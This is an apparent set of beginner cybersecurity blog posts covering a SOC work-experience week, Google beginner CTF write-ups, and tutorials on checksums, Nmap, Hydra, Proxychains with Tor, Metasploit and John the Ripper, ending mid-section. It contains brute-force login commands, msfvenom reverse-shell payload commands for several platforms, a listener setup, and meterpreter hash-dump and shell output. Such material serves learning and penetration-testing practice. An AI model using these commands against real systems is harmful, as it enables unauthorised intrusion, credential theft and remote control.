Talking to the other SOC Analysts was a great experience. I was able to talk about their experience on how they became a SOC Analyst. They did not get a University or TAFE degree. They went from working at a computer shop, to a service desk and then to SOC Analysts. One of his main points is that there are many pathways to cyber security. They also talked about what it was like working in the cyber security industry? They essentially said if you do like cyber security it will be very hard to be good at your job. They also suggested some resources to improve my capabilities.

What did I learn?

I learned a couple more resources like Peco CTF or CTFtime.org. I will be creating accounts very soon and start doing more CTFs. I also learned a bit more about the different pathways to cyber.

Wednesday

On Wednesday I had a full corporate induction. This contained everything from health & safety to what KineticIT values are. It was a necessary experience to further understand the industry. The rest of the day I worked through more tryhackme.

Thursday

Thursday was a very quiet day. For most of the day, I continued to work through tryhackme. I learned a bit more general work information from my supervisor Adrian.

Friday

On Friday, I was able to talk to Jess about the careers and paths for cyber security. She also got us to focus on some of the lesser-known jobs in the cyber security industry. She also recommended going to BSides Perth in 2022.

After talking to Jess, The SOC Analysts from Tuesday were available in person. I was able to talk a lot more in-depth with him about cyber.

What did I learn?

When talking to Jess I learned a lot more about the different paths and careers in cyber security.

I talked a bit about everything to SOC Analyst. The talks eventually lead to the process of being in the red team. If you don't know what the red team is; The red team is a team of people that emulate hackers. Depending on the rules of attack; they can physically break into the premise or hack in from the outside. The opposite of the red team is the blue team. The blue team are the defenders from the red team. The monitor logs to see if somebody is trying to hack into the systems. If they detect an intrusion, they will try to contain it as much as possible. The blue team is a much larger team than the red team. What was surprising that I learned is that 90% of the work the red team does, is OSINT investigation. The last 10% is carrying out the hack. OSINT is Open-Source-Inteligence.

Overall

I am very happy with all that I have managed this week. I have been able to wright good quality blogs every day for a week. I also feel like I learned as much as possible about working in the cyber security industry.

Goals

I have learned and reflected a lot on this week but it is no use if I don't set any goals.

My first goal is to learn more about OSINT tools. What surprised me is that 90% of the work of the red team is OSINT. I feel like I must learn these key skills for the future.

My second goal is to continue blogging 1 to 2 a week. I feel like it is an important way of improving my technical writing in addition to forcing myself to learn more material.

My third goal is to complete a CTF once a week. A Capture The Flag is an exercise where a "flag" is found in vulnerable programs. It is a great way to learn more about many different concepts.

My final goal is to continue learning content with Tryhackme once a day. Tryhackme is a great website that teaches you basic to advanced concepts

Goal list:

• Learn more about OSINT tools.
• Continue blogging 1-2 a week
• Do a complete a CTF once a week
• Continue with Tryhackme

Conclussion

Many thanks to KineticIT for allowing me to do work experience there. Thank you to the KineticIT team that warmly welcomed me. They were all happy to chat with me. Special thanks to my supervisor Adrian for setting up and running the week.

Challenge 1

When we first go to the webpage we are greeted with a login page.

If we input the wrong password we get an alert that tells us "Wrong Password!".

The first thing I did was look at the source code with ctrl+u. I scrolled down until I saw the javascript for this page. Below contains the important code for the password checker:

const checkPassword = () => {
  const v = document.getElementById("password").value;
  const p = Array.from(v).map(a => 0xCafe + a.charCodeAt(0));

  if(p[0] === 52037 &&
     p[6] === 52081 &&
     p[5] === 52063 &&
     p[1] === 52077 &&
     p[9] === 52077 &&
     p[10] === 52080 &&
     p[4] === 52046 &&
     p[3] === 52066 &&
     p[8] === 52085 &&
     p[7] === 52081 &&
     p[2] === 52077 &&
     p[11] === 52066) {
    window.location.replace(v + ".html");
  } else {
    alert("Wrong password!");

The encoding part of the code is:

const v = document.getElementById("password").value;
const p = Array.from(v).map(a => 0xCafe + a.charCodeAt(0))

Essentially, all this code is doing is grabbing the password from the text box and then turning all the characters into a charcode, charcode is the number representation of a Unicode character, and then adding 0xCafe to each character. 0xCafe is a hexadecimal number that is equivalent to 51966. The output is then turned into an array.

The password checker part is:

  if(p[0] === 52037 &&
     p[6] === 52081 &&
     p[5] === 52063 &&
     p[1] === 52077 &&
     p[9] === 52077 &&
     p[10] === 52080 &&
     p[4] === 52046 &&
     p[3] === 52066 &&
     p[8] === 52085 &&
     p[7] === 52081 &&
     p[2] === 52077 &&
     p[11] === 52066) {
    window.location.replace(v + ".html");
  } else {
    alert("Wrong password!");

What this code is doing is checking the array p, remembering p is your encoded password, and comparing the indexes of p to a number. If your encoded character does not match their number, then it will alert you that there is a "Wrong password!".

What do we know?

We know that each character of the input password will be changed into a charnumber and then 51966 is added, the 51966 is from 0xCafe. This will then be checked character by character if they match the desired sum.

What data do we have?

We have the 12 encoded characters for 12 correct characters.

How do we reverse engineer this?

Since we know the desired sum of each character, we can take away 51966 from the encoded character and turn it back into letters using the String.fromCharCode() function.

How do we do this?

First off we need to put all the known encoded characters into an array in order. This looks like:

const encoded_pass = [52037, 52077, 52077, 52066, 52046, 52063, 52081, 52081, 52085, 52077, 52080, 52066]

Secondly, we need to loop threw the array of encoded letters and minus 51966 from each character. We can turn all of the encoded characters back into plaintext. We then need to add all these characters to a string and connect them together.

Finally, we need to print it out to the console. This is all done in the code below.

const encoded_pass = [52037, 52077, 52077, 52066, 52046, 52063, 52081, 52081, 52085, 52077, 52080, 52066]
let pass = ""
for(let character of encoded_pass) {
    pass +=  String.fromCharCode(character-51966); //Remember 0xCafe = 51966
   }
console.log(pass)

This gives us the password GoodPassword

Now that we have the password we can log in. Once we login, we see some CTV and the flag.

The Flag is: CTF{IJustHopeThisIsNotOnShodan}

Challenge 2

In this challenge, you are given an image. In this image, there are multiple logic gates connected to each other. You are required to figure out what to set the inputs to get an outcome of 1.

How do we figure the flag out?

Firstly, we label all the logic gates and figure out the number of inputs required for them to turn true or false. Then we reverse the flow from the output, slowly figuring out what gates are required to be true. Eventually, you will get to the end and learn which inputs need to be true to get the output of true. Below is a completed circuit.

The flag is: CTF{BCFIJ}

Wrapup

If you want to try these challenges for yourself go to https://capturetheflag.withgoogle.com/beginners-quest .

Hydra has a graphical user interface with the xhyrdra package but I am only covering the command line use of hydra in this article.

Bruteforcing logins

This is the general syntax for brute-forcing logins.

hydra -l user -P passlist.txt ftp://10.10.193.105 -t 4
or
hydra -l user -P passlist.txt 10.10.193.105 -t 4 ftp <-- you can change this out

Bruteforcing forms

Using hydra on web forms is slightly harder. First off, you need to know whether the form you are submitting is using the GET or POST methods. The easiest way is to press ctrl+u to see the page source or use the network tab in the developer settings. You also need to know what the names of the headers are for the data you are submitting. Generally, they will be "username" and "password" but it is good to double-check. An example of what a form looks like is below:

from view-source:http://form.xyz/login

  <body class="text-center">
    <form class="form-signin" action="/login" method="post">
      <a href='/'><img class="mb-4" style='width: 200px;' src="/img/herc.gif" alt=""></a>
      <h1 class="h3 mb-3 font-weight-normal">Login</h1>

      <label for="inputEmail" class="sr-only">Username</label>
      <input type="text" name="username" class="form-control" placeholder="Username" required autofocus>
      <label for="inputPassword" class="sr-only">Password</label>
      <input type="password" name="password" class="form-control" placeholder="Password" required>
      <button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>
      <p class="mt-5 mb-3 text-muted">&copy; HydraSite 2012 - 2020</p>
    </form>
  </body>

You can see that this form is using the post method and is using the headers username & password. In addition, we need to know the subpage on the form where the login page is. In this case, it is "\login". We then can use the structure below.

hydra -l <username> -P <wordlist> IP http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

Using Proxies

The easiest way to use proxies is to set the HYDRA_PROXY variable. You can do this by:

export HYDRA_PROXY=socks4://8.42.71.5:39593

The other way to use is proxychains. I have done an article about this here if you want to learn more about it. Sadly, TOR will not work.

Extra

If you want to resume your hydra session use hydra -R

If you want more information about a specific module use the flag -U.

┌──(root㉿desktop)-[~]
└─$ hydra https-get-form -U
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-16 21:08:17

Help for module https-get-form:
============================================================================
Module http-get-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax:   <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with url-encoded (resp. base64-encoded) usernames and passwords being replaced in the
 "^USER^" (resp. "^USER64^") and "^PASS^" (resp. "^PASS64^") placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter!
The following parameters are optional:
 (c|C)=/page/uri     to define a different page to gather initial cookies from
 (g|G)=              skip pre-requests - only use this when no pre-cookies are required
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
                 ^USER[64]^ and ^PASS[64]^ can also be put into these headers!
                 Note: 'h' will add the user-defined header at the end
                 regardless it's already being sent by Hydra or not.
                 'H' will replace the value of that header if it exists, by the
                 one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
 All colons that are not option separators should be escaped (see the examples above and below).
 You can specify a header without escaping the colons, but that way you will not be able to put colons
 in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
 "/login.php:user=^USER^&pass=^PASS^:incorrect"
 "/login.php:user=^USER64^&pass=^PASS64^&colon=colon\:escape:S=authlog=.*success"
 "/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
 "/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^:H=User-Agent\: wget"
 "/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"

Refrences:

https://tryhackme.com/room/hydra

https://www.hackingarticles.in/a-detailed-guide-on-hydra/

https://tools.kali.org/password-attacks/hydra

Checksums are critically important if you want to make sure the data you have downloaded hasn't been corrupted or tampered with. Checksums are created by hash algorithms like SHA256 or MD5 directly from a file you want to verify. All you need to know about hashes is that given the exact same file, they will reproduce the exact same string of characters. If you change one character in the file the hash will be completely different. This is shown in the example below.

[root@desktop]# echo "I love checksums." | md5sum
26d1fe18b4d5414232e6707acdfc5d3b  -
[root@desktop]# echo "I love checksums" | md5sum
062753536863028865f43f4fe6e13719  -

Checksums even work on look-alikes. In the example below, I have changed the "o" in "loves" to the look-alike "о".

[user@desktop# echo "Everyone loves checksums" | md5sum
9b3a59a06b590390167ae1dcecdb9381  -
[user@desktop]# echo "Everyone lоves checksums" | md5sum
0600be673d633072ab7fb6c223eb27d3  -

What are the common utilities and hash algorithms used?

The most common hashing algorithms used in checksums are MD5 and SHA256. You will know the difference between the hashes by the number of characters. MD5 hashes are 32 characters long. A SHA256 hash will produce a 64-character long hash. If available, use the SHA256 hash as it is a more secure algorithm than MD5.

Generally, most systems on Linux will have "sha256sum" and "md5sum" installed by default. Another great utility is gtkhash, although you do have to install it on your Linux machine yourself. Here is a good tutorial about checksums on windows.

Checking Checksums

When downloading a file, generally they will have a checksum page near the download area. This is shown on the VirtualBox website below.

You would then grab the line for the specific file you have.

You then put this text into a file in the same directory as your download. In this case, my file name was sum.sha256. After that, you now need to run sha256sum -c sum.sha256. The -c flag reads from the hash file and checks the download.

[user@desktop]$ nano sum.sha256
[user@desktop]$ sha256sum -c sum.sha256 
virtualbox-6.1_6.1.34-150636.1~Ubuntu~jammy_amd64.deb: OK

It outputs that the file has not been corrupted or tampered with.

No matter whether you have an MD5 or SHA512, the commands will be very similar. All you need to switch out is the sha256sum command with md5sum or sha512sum command.

Generating Checksums

Generating checksums is even easier. All you have to do is run this command below:

[user@desktop]$ md5sum file.txt > sum.md5

When we look in the file, it has the same syntax as before.

[user@desktop]$ cat sum.md5 
129f303eeb2cea1f29a7bce8b04b18d5  file.txt

Closing Notes

Checksums are invaluable for your security. They are a quick and easy way to keep you safe. Whenever you have a chance to use checksums, use them!

What are Proxychains?

Proxychains is a program that redirects our network traffic through multiple servers throughout the world to hide our real IP address. Proxychains link together multiple of these servers together.

What is Tor

Tor is an open-source software used for online privacy and anonymity. It's designed to relay your traffic through multiple relay stations with encryption to hide your true IP address and request. It is not fast and does block some plugins but it is a safe way to browse the web.

Setting it all up

Installing Tor and Proxychains

First up, we need to actually install proxychains and tor with the apt command. It varies on different Linux distributions.

$ sudo apt install tor proxychains4

We now need to start up the tor service.

$ sudo systemctl start tor

If you want to enable it on boot use:

$ sudo systemctl enable tor

You can check if tor is running successfully by:

$ systemctl status tor          

● tor.service - Anonymizing overlay network for TCP (multi-instance-master)
     Loaded: loaded (/lib/systemd/system/tor.service; disabled; vendor preset: disabled)
     Active: active (exited) since Tue 2022-06-14 20:45:12 AWST; 33min ago
    Process: 3584 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 3584 (code=exited, status=0/SUCCESS)
        CPU: 1ms

Configuring proxychains:

On most systems, the proxychains configuration file will be located in /etc/proxychains.conf. Sometimes the proxychains.confwill be called proxychains4.conf. If you can still not find the file, use the command locate proxychains.

Now, open up the proxchains.conf in your desired text editor. Firstly, you want to uncomment dynamic_chain and make sure to comment out strict_chain, round_robin_chain, random_chain. This is to balance anonymity with usability.

# proxychains.conf  VER 4.x
#
#        HTTP, SOCKS4a, SOCKS5 tunneling proxifier with DNS.


# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
dynamic_chain <--- Uncomment this
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain <--- Comment out this
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#round_robin_chain <--- Comment out this
#
# Round Robin - Each connection will be done via chained proxies
# of chain_len length
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped).
# the start of the current proxy chain is the proxy after the last
# proxy in the previously invoked proxy chain.
# if the end of the proxy chain is reached while looking for proxies
# start at the beginning again.
# otherwise EINTR is returned to the app
# These semantics are not guaranteed in a multithreaded environment.
#
#random_chain <--- Comment out this

Secondly, uncomment proxy_dns. This is to prevent IP leaks from DNS.

## Proxy DNS requests - no leak for DNS data
# (disable all of the 3 items below to not proxy your DNS requests)

# method 1. this uses the proxychains4 style method to do remote dns:
# a thread is spawned that serves DNS requests and hands down an ip
# assigned from an internal list (via remote_dns_subnet).
# this is the easiest (setup-wise) and fastest method, however on
# systems with buggy libcs and very complex software like webbrowsers
# this might not work and/or cause crashes.
proxy_dns <--- Uncomment this

Finally, add socks5 tor proxy under [ProxyList] like bellow. You can add other proxies for added protection. But remember not all proxies are safe and the more proxies you add, the slower it is going to be. You can find some proxies here.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
socks5  127.0.0.1 9050 <--- add this
                       <--- you can add other proxies here

Running Proxy Chains

To run firefox through Tor and Proxychains in a firefox private window use this:

proxychains firefox -private https://www.dnsleaktest.com/

Note: You can run most TCP software through proxychains like nmap, Metasploit, gobuster, etc. All you have to replace is the firefox -private https://www.dnsleaktest.com/ part of the code.

Conclusions

Proxychains and Tor are invaluable resources to know about it. The best part is, it's free! The above configuration balances usability and privacy. Set it up to your own specifications to your desired needs. Some other way to upgrade the security is by making sure you are using HTTPS and TLS. If you want even more protection against snooping eyes, you can use a VPN as well. To do this, use a virtual machine with Proxychains & Tor inside it. You can then route all the traffic going out of the virtual machine with a VPN.

If you want to look at some more resources to learn more:

How TOR Works- Computerphile: https://www.youtube.com/watch?v=QRYzre4bf7I

https://www.linuxfordevices.com/tutorials/linux/proxychains-and-tor

https://hackersonlineclub.com/combination-of-vpn-tor-and-proxychain-for-more-anonymity/

Metasploit is a powerful exploitation framework full of premade exploits and payloads. It is a powerful tool that can support you at every step of the penetration testing engagement.

Metasploit has two main versions:

• Metasploit Pro: Made for the automation and management of tasks with a GUI
• Metasploit Framework: Open-source command line version.

The Main components of Metasploit are:

• msfconsole: the command-line interface
• Modules: Supported extra bits of software like exploits, scanners and payloads.
• Tools: Stand-alone tools.

Main components of Metasploit

Before we can dive into Metasploit we need to first understand what its components of it are.

• Exploits: A piece of code that uses a vulnerability to maliciously attack a system.
• Vulnerability: A design, coding, or logic flaw affecting the target system. This is what an exploit would use to maliciously attack a system
• Payload: An exploit will take advantage of a vulnerability. However, if we want to gain access to a system and actually do stuff we need to use a payload. This would be a reverse shell.

There are different modules for different types of things you want to do on a system:

Auxiliary

Any supporting modules, such as crawlers, scanners and fuzzers, are found here.

Encoders

Encoders will allow you to encode the exploit and payloads. Although encoding does help evade signature-based antivirus, its primary purpose is to get rid of bad characters. It will increase the size of the exploit.

Evasion

Evasion modules will try to evade antivirus software.

Exploits

Exploits are neatly organised by the target systems.

NOPs

NOPs (No OPeration) literally do nothing. They are sometimes used for buffers to achieve consistent payload sizes.

Payloads

Payloads are bits of code designed to take advantage of an exploit.

• Singles: Self-contained payloads (run programs, add users, etc). These do not need to download an additional component to run.
• Stagers: Sometimes you a file size restrictions. This is when stagers come in handy. Stagers are responsible for setting up a connection channel between Metasploit and the target system. Staged payloads will first upload a "stager" to the system to download the rest of the payload.
• Stages: Downloaded by the stager.

Metasploit has a special way of telling you whether your payload is a staged or stageless payload.

Stageless payloads are denoted with a (_), eg.

generic/shell_reverse_tcp
linux/shell_bind_tcp

Staged has a "/" instead of a "_".

generic/shell/reverse_tcp
linux/shell/bind_tcp

Note

You can view all these modules/payloads under /usr/share/metasploit-framework/modules if you are running on the default version of Kali Linux.

Post

Post modules are used for post-exploitation. This would be a hashdump command.

msfconsole

This is the default exploit maker. You can run by using msfconsole.

Useful commands:

Useful commands for setting up explotation

Examples

Port scanning

1. search for portscan module
2. select it
3. show the options
4. Set the params
5. run it

msf6 > search portscan

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/portscan/ftpbounce                               normal  No     FTP Bounce Port Scanner
   1  auxiliary/scanner/natpmp/natpmp_portscan                           normal  No     NAT-PMP External Port Scanner
   2  auxiliary/scanner/sap/sap_router_portscanner                       normal  No     SAPRouter Port Scanner
   3  auxiliary/scanner/portscan/xmas                                    normal  No     TCP "XMas" Port Scanner
   4  auxiliary/scanner/portscan/ack                                     normal  No     TCP ACK Firewall Scanner
   5  auxiliary/scanner/portscan/tcp                                     normal  No     TCP Port Scanner
   6  auxiliary/scanner/portscan/syn                                     normal  No     TCP SYN Port Scanner
   7  auxiliary/scanner/http/wordpress_pingback_access                   normal  No     Wordpress Pingback Locator


Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wordpress_pingback_access

msf6 > use scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) >

msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1

msf6 auxiliary(scanner/portscan/tcp) > exploit

[*] 127.0.0.1:            - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >

The Metasploit Database

When you are hacking at multiple IP/targets it can be confusing. This is when the Metasploit database comes in handy. It writes all the scans/info to a SQL database.

Using

You need to first start the database and initialize it.

systemctl start postgresql
msfdb init

Database Commands

These are the commands for the database. Make sure you are in msfconsole.

Miscellaneous

These are just a few useful miscellaneous commands.

Msfvenom

Msfvenom is a command-line, in cmd or bash, utility that allows you to access all the payloads and create them into packages for specific systems in specific formats. To see all the formats use:

msfvenom -l formats

The same goes for payloads:

root@127.0.0.1 msfvenom -l payloads

Framework Payloads (861 total) [--payload <value>]
==================================================

    Name                                                               Description
    ----                                                               -----------
    aix/ppc/shell_bind_tcp                                             Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                                            Spawn a shell on an established connection
    aix/ppc/shell_interact                                             Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                                          Connect back to attacker and spawn a command shell
    android/meterpreter/reverse_http                                   Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                                  Run a meterpreter server in Android. Tunnel communication over HTTPS
    android/meterpreter/reverse_tcp                                    Run a meterpreter server in Android. Connect back stager
    android/meterpreter_reverse_http                                   Connect back to attacker and spawn a Meterpreter shell
...

Note: When generating payloads with the output being PHP, sometimes you need to add in <?php at the start and a ?> the end.

Encoders

You can use encoders to get rid of bad characters on payloads.

msfvenom -p linux/x86/shell/reverse_tcp  -e x86/shikata_ga_nai -f hex

msfvenom -p linux/x86/shell/reverse_tcp -e x86/countdown -f hex

Handlers

Similar to reverse shells, you need to accept incoming connections by the MSFvenom payload. Metasploit has its own meterpreter shell for post-exploitation. This is called a handler. You need to:

1. use the multi handler
2. set the params and payload
3. run

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(multi/handler) > set lhost 127.0.0.1
lhost => 127.0.0.1
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/reverse_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run
...

Examples of some payloads

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf The .elf format is comparable to the .exe format in Windows. You will need to give it executive permissions. You will have to use the chmod +x shell.elf command to accord executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine command line.

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php

Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py

What is the Meterpreter?

The meterpreter is essential to the command line of the post-payload phase of hacking. Meterpreter runs in the targets systems ram. In addition, it encrypts all traffic (e.g. HTTPS). The aim is to not get identified by anti-virus, PIS and IDS.

Commands

Every meterpreter terminal can be a bit different. This is why you should always use the help command. It is important to know that meterpreter has the most generic commands built-in. Some useful commands are:

help

getpid

ps

Payloads

use the below command

msfvenom --list payloads | grep meterpreter

or when in the msfconsole use

show payloads

Post-Exploitation

migrate

You can use ps to find another processor. You can then migrate to a different process with its PID. This is to privilege escalate.

meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
meterpreter >

Other commands:

hash dump

Lists all the content in the SAM database.

meterpreter > hash dump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >

Search

locates files

meterpreter > search -f flag2.txt
Found 1 result...
    c:\File\Location\flag2.txt (34 bytes)
meterpreter >

Shell

Produces a shell. use ctrl+z to escape

meterpreter > shell
Process 2124 was created.
Channel 1 was created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Sources

https://tryhackme.com/jr/metasploitintro

https://tryhackme.com/room/metasploitexploitation

https://tryhackme.com/room/meterpreter

https://www.metasploit.com/

https://www.varonis.com/blog/what-is-metasploit

Nmap, short for Network Mapper, is one of the most commonly used ethical hacking tools used to scan for any information about networks; like open ports, open services and basic vulnerability searching. When it comes to hacking into networks, knowledge is power. Nmap gives you a lot of it. It is also a very popular program due to its ease of use and clean installation along with its standalone scripts.

When you have been given an IP of a network you need to know what services are running on the machine. You thus, need to know which ports are open to connect to that service. Ports are necessary for making multiple network requests or having multiple services available. But there are 65,535 ports on any given machine. This is when Nmap comes in. The main uses of Nmap according to their official page is:

• Open ports and services
• Discover services along with their versions
• Guess the operating system running on a target machine
• Get accurate packet routes till the target machine
• Monitoring hosts

Scan types

TCP Connect Scans (-sT)

For anyone that doesn't know what the TCP protocol is, it is a connection-based protocol. In basic terms, before you send any data between two devices you first must make a stable connection. To form this connection, you must do something called a "three-way handshake".

When you first make a connection to a server, you must first send an SYN flag. The server will then acknowledge this packet and respond with an SYN/ACK flag. Finally, our computer will reply with an ACK flag. Now you communicate whatever you want to. In plain English, it sounds like this.

1. BROWSER: "Hey server let's talk about something".
2. SERVER: "Hey browser, I'm listening to you? What do you want".
3. BROWSER: "Okay! I'll tell you now".

This type of scan is slower and is generally easier to be detected by intrusion detection systems. This scan is the default without root access scan type.

SYN Scans (-sS)

The SYN scan commonly referred to as "Half-open" scans, or "Stealth" scans, is similar to the TCP but it does not complete the full "three-way handshake".

The first two parts of the TCP and SYN scan are the exact same. You first send a SYN flag. The server will then acknowledge this connection and send back an SYN/ACK flag. This is when it differs. Now you send an RST back. An RST flag means this connection should be immediately terminated.

1. BROWSER: "Hey server let's talk about something".
2. SERVER: "Hey browser, I'm listening to you? What do you want".
3. BROWSER: "You should terminate this conversation".

This is more of a "stealthy" scan than the TCP scan and will fool old intrusion detection systems. This scan requires root permission as it needs to be able to create raw packets, this is reserved for root users.

UDP Scans (-sU)

UDP is a stateless protocol. What this means is, that it doesn't do a back-and-forth handshake like TCP. UDP connections rely on sending packets to a target port and hoping that they make it and none of them goes missing. While this is helpful for connections that aim for speed over quality it is not the best for scanning ports due to the lack of acknowledgment. This makes UDP harder and much slower to scan.

Useful switches

OS Scanning (-O)

Nmap can also provide information about the operating system using TCP/IP fingerprinting. This is also enabled by default with the aggressive switch (-A).

Service and Version Detection (-sV)

Enables version detection.

Aggressive scanning (-A)

Aggressive scanning enables Os detection, version detection, script scanning, and traceroute.

Timing (-T<0-5>)

The switch -T sets timing and aggressiveness (higher is faster). -T5 would be an incredibly fast scan that assumes you are on an extremely fast and reliable network. -T0 would be for evading intrusion detection system. This scan would be an incredibly long time and would not give too much information.

Port Scanning (-p)

By default, if you don't have this flag you will scan the top 1000 common ports.

• To specify a port just add it in after with ```-p````.

> nmap -p 973 [MACHINE IP]

• To specify multiple ports add a comma.

nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-12 [MACHINE IP]

• To scan between a range add a hyphen between two numbers.

nmap -p 76–973 [MACHINE IP]

• This will scan all 65,535 ports.

> nmap -p- [MACHINE IP]

• Use the --top-ports flag to specify the top n ports.

> nmap --top-ports 10 scanme.nmap.org

NSE Scripts (-sC)

I will not get too much into this but if you use -sC to scan ports, then it will scan with default NSE scripts that are considered useful for discovery.

Examples of Nmap scans

If I want a quick and dirty scan on a network to find the service, Os and basic open ports.

nmap -sC -sV -T4 [MACHINE IP]

If you want to launch a stealth scan on a network and try to determine the Operating System and services.

nmap -sV -p 22,53,110,143,4564 198.116.0-255.1-127

If you want to launch a TCP scan on a machine.

nmap -sT -p 22,53,110,143,4564 198.116.231.43

Closing notes

Nmap is an incredibly useful program for anyone who deals with networks daily. I am barely showing you the top of the iceberg. There is a full dedicated scripting engine, quite a few more types of scans and hundreds of other options. I highly recommend NMAP

I recommend you check out the documentation of Nmap here.

Sources

https://www.networkworld.com/article/3296740/what-is-nmap-why-you-need-this-network-mapper.html

https://www.linuxadictos.com/en/Nmap.html

https://linux.die.net/man/1/nmap

https://tryhackme.com/room/furthernmap

What is a hash?

Hashing is taking a data of any length and turning it into a fixed length string that masks it's original value of the data. Their are hundreds of different hashing algorithms and some of the more common ones are MD5, SHA1, SHA3-512, NTLM, CRC32, etc.

How do you attack hashes?

Their are two over-arching ways of cracking hashes. One of the methods is a rainbow table. Essentially, you have a precomputed table full of hashes that point to the password. This is what most websites like hashes.com use to crack your has. Although it is incredibly fast, it can take a large amount of storage space and can only use "precomputed" hashes. In addition, developers of hashing algorithms have added something called "salt" that changes the hash output. I will not be covering rainbow tables on this blog post.

Then their is the other way. Hashes are designed in a way to make cracking them near impossible. But it is possible to hash a word and see if it matches. This is the method I am going to be using. Although it is not as quick as a rainbow table, it is funner and will be able to crack nearly all hashes.

John the Ripper

Installation of John the Ripper

You can install John the ripper on your respective systems by using this link. To use john use the syntax bellow:

# Linux
john hash.txt

#Windows
./john.exe hash.txt

The Modes of John the Ripper

Single Crack Mode

This mode makes use of the information already available inside the username. The format for text file is:

username:hash

Some examples of how this would work would be with the word Anonymous:

Anonymous
an0nym0us
AnOnYmOuS
Anonymous1

Syntax: This mode is the default mode the JtR starts with but you can specify it with:

john --single hash.txt

Wordlist Crack Mode

In this mode it computes the hashes of a word list and then compares it to the one given. In JtR you can use any specified word list but it does choose a default one if none is specified. For this post i am going to be using the infamous rockyou wordlist. Example Usage:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 crack.txt

Incremental Crack Mode

